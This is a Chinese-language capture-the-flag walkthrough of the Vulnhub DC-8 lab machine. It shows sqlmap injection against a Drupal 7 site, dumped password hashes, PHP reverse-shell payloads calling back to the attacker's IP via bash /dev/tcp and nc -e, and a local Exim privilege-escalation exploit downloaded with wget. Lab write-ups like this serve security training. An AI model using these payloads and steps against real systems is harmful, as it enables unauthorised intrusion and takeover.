Vulnhub-DC-8 靶机复现完整过程

发布时间:2023年12月18日

一、环境搭建

kali的IP地址:192.168.200.14
DC-8的IP地址:192.168.200.13(一个flag)

靶机和攻击机处于同一个网络方式:nat或桥接
若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容

二、信息收集

1、扫描同网段存活主机

第一种方式:

arp-scan -l

image.png
第二种方式:

netdiscover -r 192.168.200.0/24

image.png

2、开放端口探测

nmap -sV -p-  192.168.200.13

image.png
开放端口有两个:22(SSH服务默认端口)和80(http默认端口)

3.目录扫描

image.png
image.png
image.png
查看robots。txt文件
image.png
这些禁止爬取的文件基本上都访问不了

三,漏洞探测

访问web页面
image.png
和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的
不过页面中存在这样的三个不同的URL:
http://192.168.200.13/?nid=1
http://192.168.200.13/?nid=2
http://192.168.200.13/?nid=3
可能存在文件包含和SQL注入的漏洞
image.png

SQLMAP

1、扫描数据库

 sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

image.png

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

image.png

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

image.png

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

image.png
账号:admin
密码: S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号:john
密码: S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

四。漏洞利用

1.爆破密码密文

Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中

vim  password.txt

image.png

image.png

爆破出来密文:turtle
试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了
image.png

2.反弹shell

先用获得的密码:turtle登录,试试登录后台,应该是john的密码
image.png

登录成功!
image.png

还是运用上一靶场的方法,找一找能上传一句话木马的php文件
连不上。然后显示phpinfo的地址死活没反应
直接获取shell

PHP反弹 shell(Post 请求发送命令)

<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell

<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?>

将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码
image.png
image.png
成功反弹shell
image.png

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

image.png
查询Exim 版本为4.89
image.png

利用kali搜索EXP
image.png

不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh

开启http服务

python -m http.server 8899

注:交互页面,方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

image.png
文件权限是无执行权限的,赋予执行权限

chmod 777 shell.sh

image.png
赋予可执行权限
image.png
接着根据sh脚本提示,执行文件

./shell.sh

不过奇怪的是,执行完之后还是普通权限
image.png
查看脚本的使用规则,又两个参数可用
image.png
将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功
image.png
近到root目录,查看最终flag内容
image.png

文章参考出处:https://blog.csdn.net/weixin_45744814/article/details/120113301

文章来源:https://blog.csdn.net/Continuejww/article/details/135054987
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
最新文章